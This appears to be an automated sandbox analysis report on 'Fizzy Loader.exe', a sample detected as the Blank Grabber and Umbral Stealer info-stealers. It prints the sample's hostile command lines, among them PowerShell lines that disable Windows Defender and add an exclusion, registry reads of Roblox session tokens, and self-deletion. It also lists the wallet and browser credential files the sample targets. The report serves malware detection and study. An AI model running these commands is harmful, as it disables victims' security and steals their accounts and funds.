                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeQueries volume information: C:\Users\user\Desktop\Fizzy Loader.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: Fizzy Loader.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.Fizzy Loader.exe.172aed80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Fizzy Loader.exe PID: 1708, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, type: DROPPED
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: Fizzy Loader.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.Fizzy Loader.exe.172aed80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Fizzy Loader.exe PID: 1708, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, type: DROPPED
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: Fizzy Loader.exe, 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Electrum
                        Source: Fizzy Loader.exe, 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore
                        Source: Fizzy Loader.exe, 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Exodus
                        Source: Fizzy Loader.exe, 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Ethereum
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                        Source: Fizzy Loader.exe, 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: keystore
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: Yara matchFile source: 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Fizzy Loader.exe PID: 1708, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: Fizzy Loader.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.Fizzy Loader.exe.172aed80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Fizzy Loader.exe PID: 1708, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, type: DROPPED
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: Fizzy Loader.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.Fizzy Loader.exe.172aed80000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Fizzy Loader.exe PID: 1708, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        File and Directory Permissions Modification                        		1
                        OS Credential Dumping                        		22
                        System Information Discovery                        		Remote Services1
                        Archive Collected Data                        		3
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts11
                        Command and Scripting Interpreter                        		12
                        Registry Run Keys / Startup Folder                        		11
                        Process Injection                        		21
                        Disable or Modify Tools                        		LSASS Memory1
                        Query Registry                        		Remote Desktop Protocol2
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        PowerShell                        		Logon Script (Windows)12
                        Registry Run Keys / Startup Folder                        		11
                        Obfuscated Files or Information                        		Security Account Manager211
                        Security Software Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive4
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Timestomp                        		NTDS1
                        Process Discovery                        		Distributed Component Object ModelInput Capture15
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets41
                        Virtualization/Sandbox Evasion                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Masquerading                        		DCSync11
                        Remote System Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                        Virtualization/Sandbox Evasion                        		Proc Filesystem11
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582592 Sample: Fizzy Loader.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 48 ip-api.com 2->48 50 discord.com 2->50 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 22 other signatures 2->62 8 Fizzy Loader.exe 15 16 2->8         started        signatures3 process4 dnsIp5 52 ip-api.com 208.95.112.1, 49705, 49807, 80 TUT-ASUS United States 8->52 54 discord.com 162.159.138.232, 443, 49939, 49945 CLOUDFLARENETUS United States 8->54 40 C:\ProgramData\Microsoft\...\ukUGV.scr, PE32 8->40 dropped 42 C:\Windows\System32\drivers\etc\hosts, ASCII 8->42 dropped 44 C:\Users\user\...\Fizzy Loader.exe.log, ASCII 8->44 dropped 46 C:\ProgramData\...\ukUGV.scr:Zone.Identifier, ASCII 8->46 dropped 64 Suspicious powershell command line found 8->64 66 Found many strings related to Crypto-Wallets (likely being stolen) 8->66 68 Self deletion via cmd or bat file 8->68 70 4 other signatures 8->70 13 powershell.exe 23 8->13         started        16 cmd.exe 8->16         started        18 powershell.exe 11 8->18         started        20 9 other processes 8->20 file6 signatures7 process8 signatures9 72 Loading BitLocker PowerShell Module 13->72 22 WmiPrvSE.exe 13->22         started        24 conhost.exe 13->24         started        74 Uses ping.exe to check the status of other devices and networks 16->74 26 conhost.exe 16->26         started        28 PING.EXE 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 20->34         started        36 conhost.exe 20->36         started        38 6 other processes 20->38 process10

